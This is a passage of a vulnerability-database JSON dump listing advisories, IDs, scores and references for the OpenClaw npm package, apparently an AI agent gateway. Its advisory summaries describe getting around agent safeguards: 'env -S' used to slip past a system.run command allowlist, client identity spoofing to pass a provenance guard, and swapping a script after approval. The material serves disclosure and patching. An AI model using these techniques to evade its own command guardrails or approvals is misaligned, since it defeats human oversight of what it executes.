ility":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-vmhq-cqm9-6p7q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-21eb-723m-xkfu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91663?format=json","vulnerability_id":"VCID-24eb-5jt8-aueq","summary":"Duplicate Advisory: allowlist exec-guard bypass via env -S\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-48wf-g7cp-gr3m. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.23 contain an allowlist bypass vulnerability in system.run guardrails that allows authenticated operators to execute unintended commands. When /usr/bin/env is allowlisted, attackers can use env -S to bypass policy analysis and execute shell wrapper payloads at runtime.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3f923e831364d83d0f23499ee49961de334cf58b","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3f923e831364d83d0f23499ee49961de334cf58b"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a1c4bf07c6baad3ef87a0e710fe9aef127b1f606","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a1c4bf07c6baad3ef87a0e710fe9aef127b1f606"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-exec-guard-bypass-via-env-s","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-exec-guard-bypass-via-env-s"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31992","reference_id":"CVE-2026-31992","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31992"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48wf-g7cp-gr3m","reference_id":"GHSA-48wf-g7cp-gr3m","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-48wf-g7cp-gr3m"},{"reference_url":"https://github.com/advisories/GHSA-x742-88jj-7hv9","reference_id":"GHSA-x742-88jj-7hv9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x742-88jj-7hv9"}],"fixed_packages":[],"aliases":["GHSA-x742-88jj-7hv9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-24eb-5jt8-aueq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91104?format=json","vulnerability_id":"VCID-24m7-jx1g-hqde","summary":"OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client identity spoofing\n## Summary\n\nACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state.\n\n## Impact\n\nA normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41299","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20486","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20434","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20474","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41299"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41299","reference_id":"CVE-2026-41299","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41299"},{"reference_url":"https://github.com/advisories/GHSA-6xg4-82hv-cp6f","reference_id":"GHSA-6xg4-82hv-cp6f","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6xg4-82hv-cp6f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard","reference_id":"openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41299","GHSA-6xg4-82hv-cp6f"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-24m7-jx1g-hqde"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89353?format=json","vulnerability_id":"VCID-258k-a4dw-tfae","summary":"OpenClaw: pnpm dlx approvals did not bind local script operands\n## Summary\n\nBefore OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval.\n\n## Impact\n\nAn operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @Kazamayc for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv